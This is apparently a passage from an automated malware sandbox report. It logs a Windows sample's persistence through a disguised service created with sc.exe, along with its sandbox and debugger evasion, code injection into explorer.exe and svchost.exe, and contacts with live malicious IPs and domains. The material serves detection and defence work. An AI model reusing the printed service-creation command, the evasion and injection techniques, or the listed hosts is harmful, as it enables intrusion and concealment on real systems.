                      Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\3136.exe
                      Source: C:\Windows\SysWOW64\svchost.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ffiawxs
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create ffiawxs binPath= "C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe /d\"C:\Users\user\AppData\Local\Temp\3136.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | Code function: 29_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      Hooking and other Techniques for Hiding and Protection:

                      Deletes itself after installation
                      Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\og9rnsihj7.exe
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\vfgiwcs:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                      Source: C:\Windows\SysWOW64\WerFault.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Windows\System32\svchost.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe | Process information set: NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\svchost.exe | Process information set: NOGPFAULTERRORBOX

                      Malware Analysis System Evasion:

                      Found evasive API chain (may stop execution after checking mutex)
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: vfgiwcs, 00000013.00000002.349898800.00000000004BB000.00000004.00000020.sdmp | Binary or memory string: ASWHOOK#
                      Found evasive API chain (may stop execution after checking locale)
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
                      Checks if the current machine is a virtual machine (disk enumeration)
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                      Contains functionality to detect sleep reduction / modifications
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00406AA0
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C6CF0
                      Found evasive API chain (may stop execution after checking computer name)
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep
                      Source: C:\Windows\explorer.exe TID: 960 | Thread sleep time: -34000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4860 | Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe TID: 5972 | Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4928 | Thread sleep count: 43 > 30
                      Source: C:\Windows\SysWOW64\svchost.exe TID: 4928 | Thread sleep time: -43000s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 4524 | Thread sleep time: -180000s >= -30000s
                      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 581
                      Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 370
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exe | API coverage: 8.1 %
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | API coverage: 6.2 %
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | API coverage: 6.1 %
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FC2A.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\9789.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\88E2.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7808.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2473.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3A7E.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\45AA.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2F32.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\54AF.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\6AF7.exe
                      Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\8017.exe
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Evaded block: after key decision
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | Evaded block: after key decision
                      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | API call chain: ExitProcess graph end node
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | API call chain: ExitProcess graph end node
                      Source: explorer.exe, 00000005.00000000.256329492.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
                      Source: explorer.exe, 00000005.00000000.256374084.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000005.00000000.256329492.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWve MAC Layer LightWeight Filter-0000
                      Source: svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmp | Binary or memory string: @Hyper-V RAW
                      Source: svchost.exe, 0000002F.00000002.430170249.0000013796881000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.428076474.0000013796881000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 00000007.00000002.554789678.000002A7EAC55000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.399711667.0000000005415000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.399424774.00000000053B7000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.396234617.0000000005413000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.396202885.0000000005412000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000005.00000000.249847758.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                      Source: explorer.exe, 00000005.00000000.273307731.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                      Source: explorer.exe, 00000005.00000000.257121503.000000000DC20000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATAF6
                      Source: explorer.exe, 00000005.00000000.251433696.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                      Source: explorer.exe, 00000005.00000000.273307731.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                      Source: explorer.exe, 00000005.00000000.257121503.000000000DC20000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
                      Source: svchost.exe, 00000007.00000002.534797425.000002A7E5629000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW`C
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.534535653.000001F3C5A29000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.394128637.0000000005419000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.394453975.0000000005418000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Process information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe | Code function: 29_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe | Code function: 0_2_00419A0C GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,GetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe | Code function: 28_2_006C9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_006C9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exeSystem information queried: ModuleInformation

                      Anti Debugging:

                      Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_00435870 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_005F0042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs Code function: 18_2_00640042 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exe Code function: 20_2_02070083 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exe Code function: 20_2_0208092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exe Code function: 20_2_02080D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe Code function: 22_2_008FC85A push dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_00401000 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_0040C180 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_006C092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_006C1250 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_006CC3D0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Code function: 29_2_006C092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Code function: 29_2_006C0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Code function: 29_2_008EA472 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe Process queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Process queried: DebugPort
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_00422C40 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Code function: 28_2_004048D0 VirtualProtect ?,00000004,00000100,00000000
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_0042CCB2 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_00419C55 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe Code function: 24_1_004027ED LdrLoadDll,
                      Source: C:\Users\user\AppData\Local\Temp\254E.exe Memory protected: page guard
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_0042BDF0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_00428660 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_0043AB50 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\B1B2.exe Code function: 20_2_0040976C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\3136.exe Code function: 29_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 40.93.207.0 25
                      Source: C:\Windows\SysWOW64\svchost.exe Network Connect: 94.142.143.116 443
                      Source: C:\Windows\SysWOW64\svchost.exe Domain query: patmushta.info
                      Source: C:\Windows\explorer.exe Domain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exe Network Connect: 188.166.28.199 80
                      Source: C:\Windows\explorer.exe Domain query: unicupload.top
                      Source: C:\Windows\explorer.exe Network Connect: 185.233.81.115 187
                      Source: C:\Windows\explorer.exe Network Connect: 185.7.214.171 144
                      Source: C:\Windows\explorer.exe Domain query: host-data-coin-11.com
                      Source: C:\Windows\explorer.exe Domain query: privacy-tools-for-you-780.com
                      Source: C:\Windows\SysWOW64\svchost.exe Domain query: microsoft-com.mail.protection.outlook.com
                      Source: C:\Windows\explorer.exe Domain query: goo.su
                      Source: C:\Windows\explorer.exe Domain query: transfer.sh
                      Source: C:\Windows\explorer.exe Network Connect: 185.186.142.166 80
                      Source: C:\Windows\explorer.exe Domain query: data-host-coin-8.com
                      Benign windows process drops PE files
                      Source: C:\Windows\explorer.exe File created: 3A7E.exe.5.dr
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 7B0000 protect: page execute and read and write
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Memory written: C:\Users\user\Desktop\OG9rNsihJ7.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs Memory written: C:\Users\user\AppData\Roaming\vfgiwcs base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\3BC6.exe Memory written: C:\Users\user\AppData\Local\Temp\3BC6.exe base: 400000 value starts with: 4D5A
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7B0000 value starts with: 4D5A
                      Contains functionality to inject code into remote processes
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Code function: 0_2_005F0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Users\user\Desktop\OG9rNsihJ7.exe Thread created: C:\Windows\explorer.exe EIP: 3031930
                      Source: C:\Users\user\AppData\Roaming\vfgiwcs Thread created: unknown EIP: 6DC1930
                      Source: C:\Users\user\AppData\Local\Temp\BFBD.exe Thread created: unknown EIP: 7551930
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 7B0000
                      Source: C:\Windows\SysWOW64\ffiawxs\xqfkdfcl.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 997008
                      .NET source code references suspicious native API functions
                      Source: 3BC6.exe.5.dr, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                      Source: 3BC6.exe.5.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
                      Source: 30.0.3BC6.exe.650000.1.unpack, oiranecSnoitcetorPnoitcetorPdednetxEnoitacitnehtuAytiruceSmetsyS75887.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
